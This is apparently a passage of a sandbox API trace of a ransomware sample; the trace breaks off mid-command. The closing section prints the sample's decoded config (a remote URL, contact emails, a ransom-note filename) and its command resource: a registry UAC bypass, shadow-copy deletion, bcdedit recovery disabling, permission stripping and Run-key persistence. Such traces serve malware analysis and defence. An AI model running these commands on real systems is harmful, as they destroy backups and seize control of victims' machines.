lpMultiByteStr=0x13ff48c, 
cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0174.914] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0174.914] GetThreadLocale () returned 0x409 [0174.914] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0174.914] GetCurrentThreadId () returned 0x728 [0174.914] GetCurrentThreadId () returned 0x728 [0174.914] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0174.914] GetThreadLocale () returned 0x409 [0174.914] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0174.914] GetThreadLocale () returned 0x409 [0174.914] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0174.914] GetCurrentThreadId () returned 0x728 [0174.914] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0174.914] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0174.914] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0174.914] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, 
lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, 
lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, 
lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0174.915] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0174.916] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0174.916] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0174.942] GetProcAddress 
(hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0174.942] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0174.943] GetProcAddress 
(hModule=0x77380000, lpProcName="select") returned 0x77386989 [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0174.943] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0174.944] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0174.944] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0174.950] GetACP () returned 0x4e4 [0174.950] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0174.950] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x30 [0174.950] GetTickCount () returned 0x32de2 [0174.950] 
QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=23173996971) returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4b\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x51\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x57\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x45\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x75\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x58\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] 
MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x79\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x56\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x76\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x68\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x36\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x73\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x67\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x56\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0174.951] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") 
returned 0xe [0174.951] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0174.951] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0174.952] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0174.952] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0174.952] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0174.952] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0174.952] LockResource (hResData=0x50d55c) returned 0x50d55c [0174.952] FreeResource (hResData=0x50d55c) returned 0 [0174.952] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0174.952] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0174.952] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0174.952] LockResource (hResData=0x50d64c) returned 0x50d64c [0174.952] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0174.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0174.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0174.952] FreeResource (hResData=0x50d64c) returned 0 [0174.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 32 [0174.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1414f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0174.952] GetCurrentThreadId () returned 0x728 [0174.952] GetCurrentThreadId () returned 0x728 [0174.952] GetCurrentThreadId () returned 0x728 [0174.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0174.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x13d2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0174.953] GetCurrentThreadId () returned 0x728 [0174.953] GetCurrentThreadId () returned 0x728 [0174.953] GetCurrentThreadId () returned 0x728 [0174.953] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.953] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0174.953] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0174.953] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0174.955] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=28, 
fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0174.956] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0174.957] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0174.958] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0174.958] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0174.959] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0174.960] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0174.961] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0174.963] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0174.963] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0174.963] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0174.963] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0174.963] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0174.963] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0174.963] SizeofResource 
(hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0174.964] LockResource (hResData=0x50d72c) returned 0x50d72c [0174.964] FreeResource (hResData=0x50d72c) returned 0 [0174.964] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0174.964] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0174.964] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0174.964] LockResource (hResData=0x50d64c) returned 0x50d64c [0174.964] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0174.964] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0174.964] FreeResource (hResData=0x50d64c) returned 0 [0174.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0174.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0174.964] GetCurrentThreadId () returned 0x728 [0174.964] GetCurrentThreadId () returned 0x728 [0174.964] GetCurrentThreadId () returned 0x728 [0174.964] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0174.964] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x13c9afc, cchWideChar=1410 | out: 
lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add 